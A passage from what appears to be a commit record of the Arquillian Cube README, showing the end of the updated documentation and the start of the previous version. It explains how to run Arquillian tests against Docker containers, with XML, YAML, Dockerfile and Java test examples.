+dockerfileLocation+ contains the location of +Dockerfile+ and all files required to build the container.\n<3> Property to enable or disable the no cache attribute.\n<4> Property to enable or disable the remove attribute.\n<5> Property to set the dockerfile name to be used instead of the default ones.\n\nTIP: +dockerfileLocation+ can be a directory that must contains +Dockerfile+ in root directory (in case you don't set _dockerfileName_ property), also a +tar.gz+ file or a _URL_ pointing to a +tar.gz+ file.\n\nAn example of +Dockerfile+ is:\n\n[source, properties]\n.src\/test\/resources-tomcat-7-dockerfile\/tomcat\/Dockerfile\n----\nFROM tutum\/tomcat:7.0\n\nENV JAVA_OPTS -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\nADD tomcat-users.xml \/tomcat\/conf\/ # <1>\nEXPOSE 8089\nCMD [\"\/tomcat\/bin\/catalina.sh\",\"run\"]\n----\n<1> +tomcat-users.xml+ file is located at same directory as +Dockerfile+.\n\n[[docker-compose-format]]\n== Docker-Compose Format\n\nInstead of using Arquillian Cube format, you can use Docker Compose format to define containers layout. This means that you can use the same Docker Compose file for running your tests with Arquillian Cube and without any change run `docker-compose up` command from terminal and get the same result.\n\nIt is important to note that this is not a docker-compose implementation but only the docker-compose format. This means that for example you cannot execute some CLI commands of _docker-compose_ like start several instances of same service.\n\nIn case of some specific Arquillian Cube attributes like await strategy cannot be configured and the default values are going to be used.\n\nMoreover there are some docker-compose commands that are not implemented yet due to restrictions on docker-java library. These commands are _label_, _pid_, _domainname_, _log_driver_, _security_opt_ and _read_only_. But they will be implemented as soon as docker-java library adds their support.\n\nLast thing, in case you define a command that is not implemented in Arquillian Cube, this command will be ignored (no exception will be thrown), but a log line will be printed notifying this situation. Please it is really important that if this happens you open a bug so we can add support for them. Althought this warning we will try to maintain aligned with the latest docker-compose format.\n\nLet's see how you can rewrite previous HelloWorld example with Tomcat to be used using docker-compose format.\n\nFirst let's create a file called `envs` on root of the project which configures environment variables:\n\n[source]\n.envs\n----\nTOMCAT_PASS=mypass\nJAVA_OPTS=-Djava.rmi.server.hostname=localhost -Dcom.sun.management.jmxremote.rmi.port=8088 -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\n----\n\nThen you can create a file called `docker-compose.yml` following docker-compose commands on root of the project:\n\n[source, yml]\n.docker-compose.yml\n----\ntomcat:\n env_file: envs\n image: tutum\/tomcat:7.0\n ports:\n - \"8089:8089\"\n - \"8088:8088\"\n - \"8081:8080\"\n----\n\nand finally you can configure in `arquillian.xml` file that you want to use docker-compose format.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.13<\/property>\n <property name=\"serverUri\">localhost<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n\n<container qualifier=\"tomcat\">\n <configuration>\n <property name=\"host\">${docker.tomcat.host}<\/property>\n <property name=\"httpPort\">8081<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd that's all, you can now reuse your existing docker-compose files in Arquillian Cube too.\nYou can see the full example at: https:\/\/github.com\/arquillian\/arquillian-cube\/tree\/master\/docker\/ftest-docker-compose\n\n== Enrichers\n\n*Arquillian Cube* comes with a few enrichers.\n\nOne for injecting the +CubeID+(_containerId_) of the current container created for executing the test, one that injects the +CubeController+ to call lifecycle methods on any cube and one that injects +com.github.dockerjava.api.DockerClient+ instance used to communicate with _Docker_ server.\n\nDockerClient injection only work if the tests are run in client mode, that is by using +@RunAsClient+ or by setting the testable property to false +@Deployment(testable = false)+.\n\nThese can be injected using the +@ArquillianResource+ annotation.\n\nAs examples:\n\n[source, java]\n.CubeIDResourceProvider.java\n----\n@ArquillianResource\nCubeID containerId;\n----\n\n[source, java]\n.CubeResourceProvider.java\n----\n@ArquillianResource\nDockerClient dockerClient;\n----\n\n[source, java]\n.CubeControllerProvider.java\n----\n@ArquillianResource\nCubeController cubeController;\n----\n\n=== Auto starting Cubes outside of Arquillian Containers\n\nProbably any application you may write will need an application\/servlet container but also other servers like database server or mail server.\nEach one will be placed on one _Docker Container_.\nSo for example a full application may contain one _Docker Container_ with an application server (for example _Wildfly_) and another container with a database (for example _H2_).\n\n*Arquillian Cube* can orchestrate these containers as well.\n\nAn example of orchestration can be:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"autoStartContainers\">database<\/property> <!--1-->\n<property name=\"dockerContainers\">\n wildfly_database:\n extends: wildfly\n links:\n - database:database #2\n database:\n image: zhilvis\/h2-db\n exposedPorts: [81\/tcp, 1521\/tcp]\n await:\n strategy: polling\n portBindings: [1521\/tcp, 8181->81\/tcp]\n <\/property>\n\n<container qualifier=\"wildfly_database\">\n <configuration>\n <property name=\"target\">wildfly:8.1.0.Final:remote<\/property>\n <property name=\"managementPort\">9991<\/property>\n <property name=\"username\">admin<\/property>\n <property name=\"password\">Admin#70365<\/property>\n <\/configuration>\n<\/container>\n----\n<1> This property is used to start containers before any test is executed. In this case _database_ container.\n<2> We use _link_ property to connect _Wildfly_ container to _database_ container.\n\nIn this case when a test is started both containers are started and when both are ready to receive requests, the test will be executed.\n\nAnd the database definition shall be:\n\n[source, java]\n.UserRepository.java\n----\n@DataSourceDefinition(\n name = \"java:app\/TestDataSource\",\n className = \"org.h2.jdbcx.JdbcDataSource\",\n url = \"jdbc:h2:tcp:\/\/database:1521\/opt\/h2-data\/test\",\n user = \"sa\",\n password = \"sa\"\n)\n@Stateless\npublic class UserRepository {\n\n @PersistenceContext\n private EntityManager em;\n\n public void store(User user) {\n em.persist(user);\n }\n}\n----\n\n=== Auto-Remapping\n\n*Arquillian Cube* can automatically configure default ports of container in case of port forwarding.\n\nWhat *Arquillian Cube* does internally is remapping default `DeployableContainer` port values to the ones configured in _Docker Containers_ configuration.\n\nSuppose you have a _Docker Container_ configuration like:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat_default:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8081->8080\/tcp] #1\n<\/property>\n----\n<1> Note that the exposed port is the 8081.\n\nThen in theory you should configure the remote _Tomcat_ adapter to port 8081 on your _arquillian.xml_ file.\nBut let's say that you are using that remote adapter for a remote local machine _Tomcat_ (outside _Docker_) too, and is configured to use 8080 port.\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"host\">localhost<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nWhich basically uses default port (8080) to connect to remote server.\n\nIn this case you don't need to create a new `container` tag, *Arquillian Cube* is smart enough to change the default port value automatically; in case of _Tomcat_ 8080 to 8081.\n*Arquillan Cube* will apply autoremapping to all properties that contains `port` as a substring of the property, and will remap if it is necessary.\n\nNOTE: Automapping only works in case you want to change the default server port to a _Docker_ port forwarded port.\n\n=== DockerServerIp and Containers\n\nIf you are using a remote docker server (not on _localhost_) or for example _boot2docker_ you may want to set that ip to Arquillian remote adapter configuration so it can deploy the archive under test.\nIn these cases you can hardcode this ip to Arquillian container adapter configuration or you can use the special tag +dockerServerIp+.\nAt runtime these tag will be replaced by _Arquillian Cube_ to docker server ip configured in +serverUri+ parameter.\nThis replacement only works in properties that contains the string +host+ or +address+ in property name.\n\nSo for example:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverUri\">http:\/\/192.168.0.2:2756<\/property> <!--1-->\n ...\n<\/extension>\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"host\">dockerServerIp<\/property> <!--2-->\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n<1> We set the +serverUri+ as usually.\n<2> +dockerServerIp+ is replaced at runtime.\n\nThe +host+ property will be replaced automatically to +192.168.0.2+.\n\nNOTE: This also works in case you set +serverUri+ using +boot2docker+ special word or by using the defaults. Read more about it <<boot2docker, Boot2Docker section>> and <<automatic-resolution, Automatic serverUri resolution section>>.\n\nIn case of using _unix_ socket +dockerServerUri+ is replaced to _localhost_.\n\nAlso _Arquillian Cube_ can help you in another way inferring +boot2docker+ ip.\nIn case you are running in _MACOS_ or _Windows_ with +boot2docker+, you may not need to set host property at all nor using +dockerServerIp+.\n_Arquillian Cube_ will inspect any property in configuration class that contains the word _address_ or _host_ that it is not overriden in `arquillian.xml` and it will set the +boot2docker+ server automatically.\n\nSo previous example could be modified to:\n\n[source.xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n configuration>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd in case you are running on _Windows_ or _MacOS_, `host`property will be automatically set to the +boot2docker +_ip_.\n\n== Containerless Server and Docker\n\nIn all previous sections we have seen that the application is deployed inside a container.\nFor example in case of _Tomcat_ application, resources are deployed inside a _Servlet_ container or for example in case of _Apache TomEE_ you can deploy _EJBs_ inside an _EJB_ container.\n\nBut nowadays there other kind of applications that contains the container (if they have one) embedded inside them.\nTypically these applications uses an embedded server and they are run as _CLI_ applications.\nSome examples can be _Spring Boot_, _Netty_, _SparkJava_ or _Undertow_.\n\nIf you are using some of these technologies with _Docker_, you can still use *Arquillian Cube* to write your tests.\n\n=== Java Embedded Servers\n\nLet's suppose we are writing a service which should return as text the current day and time.\nTo serve this service to the world we decide to use _undertow_ embedded server.\n\nThe code looks like:\n\n[source, java]\n.DaytimeServer.java\n----\nimport io.undertow.Undertow;\nimport io.undertow.server.HttpHandler;\nimport io.undertow.server.HttpServerExchange;\nimport io.undertow.util.Headers;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\n\npublic class DaytimeServer {\n\n public static void main(String[] args) { \/\/<1>\n\n Undertow server = Undertow.builder()\n .addHttpListener(8080, \"0.0.0.0\")\n .setHandler(new HttpHandler() {\n @Override\n public void handleRequest(final HttpServerExchange exchange) throws Exception {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat();\n exchange.getResponseHeaders().put(Headers.CONTENT_TYPE, \"text\/plain\");\n exchange.getResponseSender().send(simpleDateFormat.format(new Date()) + System.lineSeparator()); \/\/<2>\n }\n }).build();\n server.start();\n }\n}\n----\n<1> This class is a CLI application.\n<2> Returns a text with the day and time formatted with +SimpleDateFormat+.\n\nSee that this application is a CLI application which is pretty different from previous examples.\nPreviously the packaged application was deployed inside an application server, which in fact means that *Arquillian* connects to the server and tells it to deploy that file.\n\nIn this example there is no application server nor servlet server waiting for *Arquillian* to deploy an archive but the application is self-contained, it contains everything.\nSo in fact if you want to run the application probably you will end up by doing something like +java -jar daytime.jar+.\n\nSo how to write a test for these classes if we are using _Docker_ as runtime container?\n\nThe first thing to do is add +arquillian-cube-containerless+ dependency.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-containerless<\/artifactId>\n <version>${arquillian.cube.version}<\/version>\n<\/dependency>\n----\n\nNext step is creating a +Dockerfile+.\nThis is required because we need to set not only the container image to be used but how to run the application.\nBut see that there is a problem on creating a +Dockerfile+ in this case.\nThe +jar+ name is not static because it will depend on the name you give during the creation of the archive (using _Shrinkwrap_).\nSo in fact +Dockerfile+ should be templaterized.\nAnd this is something that *Arquillian Cube* can do for you.\nThe idea is creating a file called +DockerfileTemplate+.\n\n[source, terminal]\n.src\/test\/resources\/daytime\/DockerfileTemplate\n----\nFROM java:7\n\nWORKDIR \/usr\/src\/server\nCOPY ${deployableFilename} \/usr\/src\/server\/${deployableFilename} #1\nEXPOSE 8080\nCMD [\"java\", \"-jar\", \"${deployableFilename}\"]\n----\n<1> +${deployableFilname}+ will be replaced at runtime by the name of the +jar+ file created by _Shrinkwrap_.\n\nThen we need to touch +arquillian.xml+ file by setting an special container definition so *Arquillian* doesn't crash because of trying to deploy the archive into a none defined container.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\"> <!--1-->\n daytime:\n buildImage: <!--2-->\n dockerfileLocation: src\/test\/resources\/undertow <!--3-->\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\"> <!--4-->\n <configuration>\n <property name=\"containerlessDocker\">daytime<\/property> <!--5-->\n <property name=\"embeddedPort\">8080<\/property> <!--6-->\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The Docker container is defined as per usual.\n<2> buildImage attribute is used to define the dockerfile location.\n<3> This attribute sets the directory where the +Dockerfile+ is stored. In fact in this case it is the directory where +DockerfileTemplate+ file is stored.\n<4> A container provided by *Arquillian Cube* must be defined.\n<5> This property is used to set which container must be started.\n<6> This property sets the exposed port by the embedded server.\n\nAnd finally the test:\n\n[source, java]\n.DaytimeTest.java\n----\n@RunWith(Arquillian.class)\npublic class DaytimeTest {\n\n private static final String LINE_SEPARATOR = System\n .getProperty(\"line.separator\");\n\n @Deployment(testable = false) \/\/<1>\n public static JavaArchive createDeployment() {\n JavaArchive[] undertow = Maven.resolver().resolve(\"io.undertow:undertow-core:1.1.1.Final\").withTransitivity().as(JavaArchive.class); \/\/<2>\n\n JavaArchive jar = ShrinkWrap\n .create(JavaArchive.class, \"daytime.jar\")\n .addClass(DaytimeServer.class); \/\/<3>\n\n for (JavaArchive javaArchive : undertow) { \/\/<4>\n jar.merge(javaArchive);\n }\n\n jar.addAsManifestResource(\n new StringAsset(\n \"Main-Class: org.arquillian.cube.impl.containerless.DaytimeServer\"\n + LINE_SEPARATOR), \"MANIFEST.MF\"); \/\/<5>\n return jar;\n }\n\n @Test\n public void shouldReturnDateFromDaytimeServer(@ArquillianResource URL base) { \/\/<6>\n try (\n BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, notNullValue());\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> _ShrinkWrap_ Maven resolver gets all dependencies for _Undertow_.\n<3> Create a +jar+ file called +daytime.jar+ with +DaytimeServer+ class.\n<4> +Undertow+ dependencies are merged inside +jar+.\n<5> Because it is a runnable +jar+, +MANIFEST+ is created accordantly.\n<6> Simple test.\n\n=== Polyglot Applications\n\nIn previous section we have seen that we can test any _java_ _CLI_ application that offers a socket connection.\nBut if you think clearly there is nothing that avoid *Arquillian Cube* to deploy applications developed in other languages like _Node.js_, _Play_, _Ruby on Rails_, ...\n\nLet's see an example on how you can use *Arquillian Cube* to test a _Node.js_ _hello world_ application.\n\nFirst thing to do is create the _Node.js_ application.\n\n[source, json]\n.src\/main\/js\/package.json\n----\n{\n \"name\": \"helloworld-server\",\n \"version\": \"0.0.1\",\n \"description\": \"A NodeJS webserver to run inside a docker container\",\n \"author\": \"asotobu@gmail.com\",\n \"license\": \"APLv2\",\n \"dependencies\": {\n \"express\": \"*\"\n },\n \"scripts\": {\"start\": \"node index.js\"}\n}\n----\n\n[source, javascript]\n.src\/main\/js\/index.js\n----\nvar express = require('express');\n\nvar app = express();\n\napp.get('\/', function(req, res){\n res.send('Hello from inside a container!');\n});\n\napp.listen(8080);\n----\n\nThen we need to define a +DockerfileTemplate+ as we did for +Undertow+.\n\n[source]\n.src\/test\/resources\/node\/DockerfileTemplate\n----\nFROM node:0.11.14\n\nRUN mkdir -p \/usr\/src\/app\nWORKDIR \/usr\/src\/app\n\nADD ${deployableFilename} \/usr\/src\/app #1\nRUN npm install\nEXPOSE 8080\n\nCMD [ \"npm\", \"start\" ]\n----\n<1> We need to use +ADD+ command adding the deployed file instead of +COPY+. We are going to see why below.\n\nFinally the +arquillian.xml+ configuration file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\">\n node:\n buildImage:\n dockerfileLocation: src\/test\/resources\/node\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\">\n <configuration>\n <property name=\"containerlessDocker\">node<\/property> <!--1-->\n <property name=\"embeddedPort\">8080<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> This property is used to set which container must be started. In this case +node+.\n\nAnd finally the *Arquillian* test.\n\n[source, java]\n.NodeTest.java\n----\n@RunWith(Arquillian.class)\npublic class NodeTest {\n\n @Deployment(testable = false) \/\/<1>\n public static GenericArchive createDeployment() {\n return ShrinkWrap.create(GenericArchive.class, \"app.tar\") \/\/<2>\n .add(new ClassLoaderAsset(\"index.js\"), \"index.js\")\n .add(new ClassLoaderAsset(\"package.json\"), \"package.json\");\n }\n\n @Test\n public void shouldReturnMessageFromNodeJs(@ArquillianResource URL base) { \/\/<3>\n try (BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, is(\"Hello from inside a container!\"));\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> +GenericArchive+ with +tar+ extension must be created using _Shrinkwrap_.\n<3> Simple test.\n\nNOTE: +GenericArchive+ must end with +tar+ extension because it is expected by *Arquillian Cube*. When you use +ADD+ in +Dockerfile+, _Docker_ will untar automatically the file to given location.\n\n== Future work\n\nAPI will continuously evolve to fit requirements of an enterprise application as well as providing integration with _Kubernates_ and other Docker related tools.\nAlso some configuration parameters will be modified to fix any possible requirements.\nAlthough we are going to try to not break compatibility with previous versions, we cannot guarantee until _beta_ stage.\n\nFeel free to use it and any missing feature, bug or anything you see , feel free to add a new issue.\n","old_contents":"= Arquillian Cube\n\nDocumentation for version Alpha3 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha3\/README.adoc\n\nDocumentation for version Alpha2 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha2\/README.adoc\n\nDocumentation for version Alpha1 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha1\/README.adoc\n\n\nWARNING: 1.0.0.Alpha7 breaks incompatibility with previous versions in some cases. The major difference is that instead of using the _boot2docker_ keyword to refer to the auto resolved boot2docker ip in the _serverUri_ parameter, you should now used _dockerHost_.\n\n== What is this?\n\n*Arquillian Cube* is an _Arquillian_ extension that can be used to manager _Docker_ containers from _Arquillian_.\n\nExtension is named *Cube* for two reasons:\n\n* Because Docker is like a cube\n* Because http:\/\/en.memory-alpha.org\/wiki\/Borg_cube[Borg starship] is named *cube* and well because we are moving tests close to production we can say that \"any resistance is futile, bugs will be assimilated\".\n\nWith this extension you can start a _Docker_ container with a server installed, deploy the required deployable file within it and execute _Arquillian_ tests.\n\nThe key point here is that if _Docker_ is used as deployable platform in production, your tests are executed in a the same container as it will be in production, so your tests are even more real than before.\n\nBut it also lets you start a container with every required service like database, mail server, ... and instead of stubbing or using fake objects your tests can use real servers.\n\n[WARNING]\n====\nThis extension has been developed and tested on a Linux machine with the _Docker_ server already installed.\nIt works with *Boot2Docker* as well in _Windows_ and _MacOS_ machines, but some parameters like _host ip_ must be the _Boot2Docker_ server instead of _localhost_ (in case you have _Docker_ server installed inside your own machine).\n\nOne of the best resources to learn about why using _Boot2Docker_ is different from using _Docker_ in Linux can be read here http:\/\/viget.com\/extend\/how-to-use-docker-on-os-x-the-missing-guide\n====\n\n== Preliminaries\n\n*Arquillian Cube* relies on https:\/\/github.com\/docker-java\/docker-java[docker-java] API.\n\nTo use *Arquillian Cube* you need a _Docker_ daemon running on a computer (it can be local or not), but probably it will be at local.\n\nBy default the _Docker_ server uses UNIX sockets for communicating with the _Docker_ client. *Arquillian Cube* will attempt to detect the operating system it is running on and either set _docker-java_ to use UNIX socket on _Linux_ or to <<Boot2Docker>> on _Windows_\/_Mac_ as the default URI.\n\nIf you want to use TCP\/IP to connect to the Docker server, you'll need to make sure that your _Docker_ server is listening on TCP port.\nTo allow _Docker_ server to use TCP add the following line to +\/etc\/default\/docker+:\n\n+DOCKER_OPTS=\"-H tcp:\/\/127.0.0.1:2375 -H unix:\/\/\/var\/run\/docker.sock\"+\n\nAfter restarting the _Docker_ daemon you need to make sure that _Docker_ is up and listening on TCP.\n\n[source, terminal]\n----\n$ docker -H tcp:\/\/127.0.0.1:2375 version\n\nClient version: 0.8.0\nGo version (client): go1.2\nGit commit (client): cc3a8c8\nServer version: 1.2.0\nGit commit (server): fa7b24f\nGo version (server): go1.3.1\n----\n\nIf you cannot see the client and server versions then it means that something is wrong with the _Docker_ installation.\n\n== Basic Example\n\nAfter having a _Docker_ server installed we can start using *Arquillian Cube*.\nIn this case we are going to use a very simple example using a _Docker_ image with _Apache Tomcat_ and we are going to test a _Servlet_ on it.\n\n[source, java]\n.HelloWorldServlet.java\n----\n@WebServlet(\"\/HelloWorld\")\npublic class HelloWorldServlet extends HttpServlet {\n\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n PrintWriter writer = resp.getWriter();\n writer.println(\"Hello World\");\n }\n}\n----\n\n[source, java]\n.HelloWorldServletTest.java\n----\n@RunWith(Arquillian.class)\npublic class HelloWorldServletTest {\n\n @Deployment(testable=false) \/\/<1>\n public static WebArchive create() {\n return ShrinkWrap.create(WebArchive.class, \"hello.war\").addClass(HelloWorldServlet.class); \/\/<2>\n }\n\n @Test\n public void should_parse_and_load_configuration_file(@ArquillianResource URL resource) throws IOException { \/\/<3>\n\n URL obj = new URL(resource, \"HelloWorld\");\n HttpURLConnection con = (HttpURLConnection) obj.openConnection();\n con.setRequestMethod(\"GET\");\n\n BufferedReader in = new BufferedReader(\n new InputStreamReader(con.getInputStream()));\n String inputLine;\n StringBuffer response = new StringBuffer();\n\n while ((inputLine = in.readLine()) != null) {\n response.append(inputLine);\n }\n in.close();\n\n assertThat(response.toString(), is(\"Hello World\"));\/\/<4>\n }\n}\n----\n<1> In this case we are running the test as a client. So in fact this test is executed against the container instead of inside the container.\n<2> No changes in this part, we need to create a deployable file, and because we are testing against _Tomcat_, a _war_ file is created.\n<3> Because the test is run as client, we can use +@ArquillianResource+ to get the URL where the file is deployed. Note that this will be the URL to access _Tomcat_ running inside the _Docker_ container.\n<4> Typical jUnit assertion of servlet response.\n\nNow this test could be run in any container, there is nothing that ties this to _Docker_.\nNext step is adding some dependencies apart from the typical _Arquillian_ dependencies.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-docker<\/artifactId> <!--1-->\n <version>${project.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n\n<dependency>\n <groupId>org.jboss.arquillian.container<\/groupId>\n <artifactId>arquillian-tomcat-remote-7<\/artifactId> <!--2-->\n <version>1.0.0.CR7<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n<1> Adds *Arquillian Cube* dependency.\n<2> From the point of view of _Arquillian_, _Tomcat_ is being executed in a remote host (in fact this is true because _Tomcat_ is running inside _Docker_ which is external to _Arquillian_), so we need to add the remote adapter.\n\nAnd finally we need to configure _Tomcat_ remote adapter and *Arquillian Cube* in +arquillian.xml+ file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\"> <!--1-->\n <property name=\"serverVersion\">1.12<\/property> <!--2-->\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property> <!--3-->\n <property name=\"dockerContainers\"> <!--4-->\n tomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"tomcat\" default=\"true\"> <!--5-->\n <configuration>\n <property name=\"host\">localhost<\/property> <!--6-->\n <property name=\"httpPort\">8080<\/property> <!--7-->\n <property name=\"user\">admin<\/property> <!--8-->\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> *Arquillian Cube* extension is registered.\n<2> _Docker_ server version is required.\n<3> _Docker_ server URI is required. In case you are using a remote _Docker_ host or _Boot2Docker_ here you need to set the remote host ip, but in this case _Docker_ server is on same machine.\n<4> A _Docker_ container contains a lot of parameters that can be configured. To avoid having to create one XML property for each one, a YAML content can be embedded directly as property.\n<5> Configuration of _Tomcat_ remote adapter. Cube will start the _Docker_ container when it is ran in the same context as an _Arquillian_ container with the same name.\n<6> Host can be _localhost_ because there is a port forwarding between container and _Docker_ server.\n<7> Port is exposed as well.\n<8> User and password are required to deploy the war file to remote _Tomcat_.\n\nAnd that's all.\nNow you can run your test and you will see how _tutum\/tomcat:7.0_ image is downloaded and started.\nPorts 8080 (Tomcat standard port) and 8089(JMX port used by Arquillian) are exposed.\nFinally in _env_ section, environment variables are set. Read next link to understand why this is required https:\/\/docs.jboss.org\/author\/display\/ARQ\/Tomcat+7.0+-+Remote\n\n== Configuration\n\n*Arquillian Cube* requires some parameters to be configured, some related with _Docker_ server and others related on the image that is being used.\nLet's see valid attributes:\n\n[cols=\"2*\"]\n|===\n|serverVersion\n|Version of REST API provided by_Docker_ server. You should check on the _Docker_ site which version of REST API is shipped inside installed _Docker_ service. This field is not mandatory and if it's not set the default provided version from _docker-java_ will be used.\n\n|serverUri\n|Uri of _Docker_ server. If the _Docker_ server is running natively on Linux then this will be an URI pointing to _localhost_ docker host but if you are using _Boot2Docker_ or a remote _Docker_ server then the URI should be changed to point to the _Docker_ remote _URI_. It can be a unix socket URI as well in case you are running _Docker_ on Linux (+unix:\/\/\/var\/run\/docker.sock+). Also you can read at <<automatic-resolution, this section>> about automatic resolution of serverUri parameter. Also you can use `DOCKER_HOST` java property or system environment to set this parameter.\n\n|dockerRegistry\n|Sets the location of Docker registry. Default value is the official _Docker_ registry located at https:\/\/registry.hub.docker.com\n\n|dockerContainers\n|Each _Docker_ image (or container) can be configured with different parameters. This configuration is provided in YAML format. This property can be used to embed as YAML string value, all configuration.\n\n|dockerContainersFile\n|Instead of embedding YAML as a string, you can set the location of a YAML file with this attribute. The location can be a relative from the root of the project or also a URI that is converted to URL so you can effectively have docker definitions on remote sites.\n\n|definitionFormat\n|Sets the format of content expressed in `dockerContainers` attribute or in file set in `dockerContainersFile`. It can contain two possible values _CUBE_ (default one in case of not set) to indicate that content is written following <<cube-format, Arquillian Cube>> format or _COMPOSE_ to indicate that content is written following <<docker-compose-format, Docker Compose>> format.\n\n|autoStartContainers\n|Cube will normally only start a _Docker_ container when it has the same name as an active _Arquillian_ container. That works for things that are _DeployableContainer_'s. For any other service, e.g. a database, you can use the _autoStartContainers_ option to define which _Docker_ containers to automatically start up. The option takes a comma separated list of _Docker_ container ids. e.g. _tomcat7, mysql_. *Arquillian Cube* will attempt to start the containers in parallel if possible as well as start any linked containers.\n\n|certPath\n|Path where certificates are stored. If you are not using _https_ protocol this parameter is not required. This parameter accepts starting with ~ as home directory\n\n|boot2dockerPath\n|Sets the full location (and program name) of _boot2docker_. For example +\/opt\/boot2dockerhome\/boot2docker+.\n\n|dockerMachinePath\n|Sets the full location (and program name) of _docker-machine_. For example +\/opt\/dockermachinehome\/docker-machine+.\n\n|machineName\n|Sets the machine name in case you are using docker-machine to manage your docker host. This parameter is mandatory when using docker-machine.\n\n|connectionMode\n|Connection Mode to bypass the Create\/Start Cube commands if the a Docker Container with the same name is already running on the target system. This parameter can receive three possible values. _STARTANDSTOP_ which is the default one if not set any and simply creates and stops all Docker Containers. If a container is already running, an exception is thrown. _STARTORCONNECT_ mode tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if it is the case doesn\u2019t stop it at 